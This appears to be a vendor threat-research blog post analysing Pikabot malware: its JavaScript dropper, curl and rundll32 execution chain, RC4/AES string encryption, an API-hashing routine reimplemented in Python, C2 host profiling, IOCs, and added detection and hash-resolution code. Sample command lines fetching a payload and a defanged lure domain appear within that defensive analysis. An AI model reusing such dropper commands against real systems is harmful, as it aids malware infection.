In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
Since October 2023, our Threat Response Unit (TRU) has observed multiple instances of the Pikabot malware affecting customers within the manufacturing and business services industries.
The initial infection stems from an email containing a link to download a ZIP archive, which in turn contains an obfuscated JavaScript file that infects the device when the user executes it.
Upon cleaning up the JS file, we can see that it creates the directories “Epfijglsorg\\Ijfkmvofguv” under %SYSTEMDRIVE% (2), then attempts to retrieve the malicious .DAT file from the URLs (1, 2, 5) via curl. Upon successful retrieval, the file is renamed to Wiflgodjvo.dll. The malicious DLL is then executed with rundll32.exe using the export name “Enter” (4), as shown in Figure 1.
PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). The core payload of PikaBot encrypts its strings with an inline RC4 routine. Upon decrypting the strings, we get base64-encoded strings, as shown in Figure 2.
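The execution chain above (a script-host-driven curl download of a .DAT file, followed by rundll32.exe invoking the renamed DLL's “Enter” export from a freshly created directory under the system drive) can be turned into simple process-creation detection logic. This is an added example, not code from the eSentire post: the event format, the regexes and the sample telemetry are constructed here, the payload URL is a placeholder, and it assumes the JavaScript dropper runs under wscript.exe or cscript.exe.

```python
import re

# Script hosts the obfuscated JS is assumed to run under (assumption, not from the post).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# DLL directories treated as legitimate for rundll32; everything else is suspicious.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# curl writing a .dat file:   curl.exe -o <path>.dat <url>
CURL_DAT = re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-o|--output)\s+\"?([^\s\"]+\.dat)\"?", re.IGNORECASE)
# rundll32 calling the "Enter" export:   rundll32.exe <path>.dll,Enter
RUNDLL32_ENTER = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\s\",]+\.dll)\"?\s*,\s*Enter\b", re.IGNORECASE)

def detect_pikabot_chain(events):
    """Return (rule, artefact) findings for process-creation events that match
    the PikaBot dropper chain described in the post."""
    findings = []
    for ev in events:
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
        if image == "curl.exe" and parent in SCRIPT_HOSTS:
            m = CURL_DAT.search(cmd)
            if m:
                findings.append(("script-host curl download of .dat payload", m.group(1)))
        elif image == "rundll32.exe":
            m = RUNDLL32_ENTER.search(cmd)
            if m and not m.group(1).lower().startswith(TRUSTED_DLL_DIRS):
                findings.append(("rundll32 'Enter' export from non-system path", m.group(1)))
    return findings

# Constructed sample telemetry (not real logs). Events 1-2 mirror the chain in
# Figure 1; events 3-4 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Epfijglsorg\Ijfkmvofguv\Wiflgodjvo.dat hxxp://placeholder.invalid/payload.dat"},
    {"parent": "wscript.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Epfijglsorg\Ijfkmvofguv\Wiflgodjvo.dll,Enter"},
    {"parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Temp\report.csv https://example.invalid/report.csv"},
]

if __name__ == "__main__":
    for rule, artefact in detect_pikabot_chain(SAMPLE_EVENTS):
        print(f"[!] {rule}: {artefact}")
```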
The inline RC4 encryption in Pikabot is used to obfuscate its strings, making it more difficult for security researchers and automated detection systems to analyze and identify the malware's purpose and behavior.
The RC4-decrypted base64-encoded strings then go through another decryption layer with AES, as shown in Figure 3. The key and IV are encrypted with RC4.
For further analysis on Pikabot, please refer to research published by OALabs here and here.
PikaBot uses API hashing (Figure 4) for only a few API calls; the rest are encrypted using the method described above. The C2 is also encrypted with the same algorithm, but with a different AES key and IV.
Here is the Python implementation of the hashing algorithm used:
```python
def api_hashing(data, length):
    # Seed value, then fold each byte in: hash = lower(byte) + 5 * hash
    v2 = 8387
    if data and length:
        for i in range(length):
            v4 = data[i] & 0xFF
            v5 = v4 + 32           # ASCII upper-case -> lower-case
            if not 65 <= v4 <= 90:
                v5 = v4            # non-upper-case bytes are used as-is
            v2 = v5 + 5 * v2
    return v2 & 0xFFFFFFFF         # truncate to a 32-bit value

def calculate_and_print_hash(data_string):
    data_bytes = data_string.encode()
    hash_result = api_hashing(data_bytes, len(data_bytes))
    value = hex(hash_result)
    print(f"Hash result '{data_string}': {value}")

calculate_and_print_hash("LoadLibraryA")
calculate_and_print_hash("HeapFree")
calculate_and_print_hash("GetProcAddress")
```
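Because the routine folds upper-case letters to lower-case before mixing, the hash is case-insensitive, and the practical use of it for an analyst is in reverse: pre-compute the hash of every export name in the DLLs a sample imports from and look up the 32-bit constants found in the binary. The following resolver is an added example, not code from the post; the short export list is constructed, and in practice it would be replaced by the real export tables of kernel32.dll, ntdll.dll and the like.

```python
def pikabot_api_hash(name: bytes) -> int:
    """PikaBot API hash: seed 8387, then h = lower(c) + 5*h for each byte, truncated to 32 bits."""
    h = 8387
    for c in name:
        if 65 <= c <= 90:      # ASCII 'A'..'Z' -> 'a'..'z'
            c += 32
        h = c + 5 * h
    return h & 0xFFFFFFFF

def build_hash_table(export_names):
    """Map hash -> export name. Case folding inside the hash means 'LoadLibraryA'
    and 'loadlibrarya' hash identically, so one casing per name is enough."""
    table = {}
    for name in export_names:
        h = pikabot_api_hash(name.encode())
        if h in table and table[h].lower() != name.lower():
            raise ValueError(f"collision: {table[h]!r} and {name!r} both hash to {h:#010x}")
        table[h] = name
    return table

def resolve_hashes(hash_values, table):
    """Resolve 32-bit constants pulled from a sample; unknown hashes map to None."""
    return {h: table.get(h) for h in hash_values}

# Constructed wordlist (assumption): a real run would load DLL export tables, e.g. with pefile.
SAMPLE_EXPORTS = ["LoadLibraryA", "HeapFree", "GetProcAddress", "VirtualAlloc", "CreateMutexW"]

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    # Constants here are produced from the list itself; in practice they come from the sample.
    unknown = [pikabot_api_hash(b"HeapFree"), pikabot_api_hash(b"VirtualAlloc"), 0xDEADBEEF]
    for h, name in resolve_hashes(unknown, table).items():
        print(f"{h:#010x} -> {name or '<unresolved>'}")
```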
Upon successful infection, PikaBot gathers basic host information and sends it to the C2. The commands run on the host include:
Example of some of the information gathered by PikaBot with placeholders:
{\"29sogk11\": \"%s\", \"8MYMnroOE\": \"%s\", \"D2eHqm\": \"Win %d.%d %d\", \"Svr0U\": %s, \"YvqsXd96s\": \"%s\", \"Gk03HL\": \"%s\", \"KEIsAH\": \"%s\", \"6oX3zxl\": %d, \"J2pBsnnT\": \"%s\", \"vxcY4IafK\": %d, \"CoV203qs\": \"%s\", \"OLZpE2\": \"%s\", \"9NMqowk9\": \"%s\", \"TnyWDGp46\": \"%s\", \"yrjOT\": \"%s\", \"jcjIbRIYD\": %d, \"XPQG7Z5l\": %d}
For example, D2eHqm holds the Windows version, YvqsXd96s holds the username, Gk03HL holds the system name, KEIsAH holds the processor information, J2pBsnnT holds display adapter information, vxcY4IafK holds the RAM size, CoV203qs holds the screen size, OLZpE2 holds the Pikabot ID (in our case it’s “1.1.19-gen”), and 6oX3zxl likely holds the value of the TickCount.
The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code (Figure 5).
Pikabot creates the hardcoded mutex value “{C1E8A9B1-57F0-47B0-AB93-C739C6592C5F}” upon successful infection to avoid reinfecting the host.
In one particular customer environment, we observed an unsuccessful attempt at a Pikabot infection via drive-by download. In this instance, the client searched for an AnyDesk installer and stumbled across the malicious page anadesky.firstbasedso[.]com (Figure 6), from which they downloaded a malicious MSI installer signed by “The New Print Shop LTD”.
Jérôme Segura, the Senior Director of Threat Intelligence at Malwarebytes, also published an article on December 15, 2023, detailing how Pikabot leverages malicious ads for its distribution.
Pivoting with VirusTotal, we found another two domains impersonating Slack and Zoom, as shown in Figures 7-9.
Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat, and notified the customer of suspicious activities.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.